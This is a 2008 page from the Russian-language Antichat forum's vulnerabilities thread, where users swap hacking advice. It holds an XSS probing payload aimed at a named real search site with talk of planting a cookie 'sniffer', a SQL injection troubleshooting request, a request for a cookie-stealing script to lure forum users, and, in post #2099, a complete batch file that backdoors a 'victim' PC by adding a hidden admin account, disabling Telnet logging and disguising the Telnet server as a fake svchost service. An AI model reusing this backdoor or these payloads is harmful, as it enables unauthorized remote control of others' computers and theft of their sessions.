ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2091  
Старый 27.05.2008, 23:46
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Цитата:
Сообщение от Demetra  
каталог статей,после индексной страницы ставлю <IMG%20SRC="javascript:alert();
site.ru/index.php<IMG%20SRC="javascript:alert(); так чтоли? ну конечно ничего работать не будет...ты никакому параметру не передаешь значение.
 

  #2092  
Старый 28.05.2008, 05:53
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)

Последний раз редактировалось ZET36; 28.05.2008 в 07:39..
 

  #2093  
Старый 28.05.2008, 11:33
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию

все остальное вобще некатит,а это заглючило подумала может что то есть
 

  #2094  
Старый 28.05.2008, 12:51
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

Demetra не нужно после ссылки ставить <img src=javasript:alert()> нужно проверять переменные, вот смотри есть ссылка

http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r=%F1%EA %E0%F7%E0%F2%FC+mp3
пременная r отвечает за текст который ты исщещ в поисковике . и проверяеш её на фильтрацию (тоесть вставляеш туда свой скрипт)

http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r="><scr ipt>alert(1)</script>
если сообщение выскакивает значит фильтрации нет и xss уязвимость есть и можно вставлять скрипт снифера, если нет то фильтрация есть , а вообще тебе рано xss изучать если ты незнаеш html и jajascript скачай учебники и учи , без знания этих языков ты не сможеш испльзовать и искать xss уязвимости ,

Последний раз редактировалось ZET36; 28.05.2008 в 12:55..
 

  #2095  
Старый 28.05.2008, 12:58
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

ZET36давно не сидел в хр(поэтому может немного отходить от истины). заходишь в службы: выполнить "gpedit.msc" там в службах включи службу сервера телнет.
Цитата:
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт
по поводу телнета не знаю, а вот через ssh можешь. Команда будет выглядеть ssh user@sait - в линуксе. если через питти - тогда ставишь 21 порт заместо 22
 

  #2096  
Старый 28.05.2008, 13:04
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

samarin спасибо
 

  #2097  
Старый 28.05.2008, 13:14
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

Всем здрасте, вопрос касательно MySQL инъекции. Имеем инъекцию вида:
http://site/polls/?kwd=1
Ответ получаем:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/wwwdocs/features/polls/pollofdayarchive.php on line 53
При пустом параметре kwd - ошибки нет.
Запрос вида http://site/polls/?kwd=OR 1=1 также выдает ошибку, пробовал вариации типа:
http://site/polls/?kwd=)+OR+1=1 и т.д. на любое изменение параметра kwd ругается, однако вставить свой запрос не выходит...
Также... При kwd=0 ошибки нет, а при kwd=1-1 ошибка есть.
Кто что может посоветовать?
P.S. С радостью приму помощь в icq: 59600O00

Последний раз редактировалось Dima-k17; 28.05.2008 в 13:18..
 

  #2098  
Старый 28.05.2008, 14:52
Paha007
Участник форума
Регистрация: 02.03.2008
Сообщений: 153
Провел на форуме:
1758769

Репутация: 341
Отправить сообщение для Paha007 с помощью ICQ
По умолчанию

прив всем....
вопрос такой: как зделать так чтобы в Internet Explorer.е не вылетала табличка сохранить пороль, а чтоб автоматом его сохраняла и не задавала глупых вопросов))))
 

  #2099  
Старый 28.05.2008, 15:13
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

Цитата:
Сообщение от ZET36  
Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)
---bat файл---
Код:
@echo off
net localgroup TelnetClients /add
net user admin pass /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client
После запуска этого батника к компу можно коннектится телнетом
 

  #2100  
Старый 28.05.2008, 16:06
maximkafun
Новичок
Регистрация: 19.05.2008
Сообщений: 20
Провел на форуме:
275542

Репутация: 0
По умолчанию

Всем доброго время суток...У меня такой вопрос,знаю что не мало обсуждался,но именноо то что мне нужно я не нашел(может плохо искал,но не нашел)
Мне нужен пхп-скрипт для кражи "печенюшек" с того сайта/форума которого он перешел на эту страницу...Тоесть,я например даю ссылку пользователлю форума и говорю посмотри классные девки,он переходит на ссылку (где спрятан скрипт кражи кукисов) и все его куки сохраняются в отдельный файл...у меня когда то был такой,но как грицо СПЛЫЛ...не ставьте мне "-",я только новичёк,и вроде обратился по теме,или киньте хотя бы ссылку где можна это взять...заранее благодарен
Кто напишет в ПМ,буду оч сильно благодарен!
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ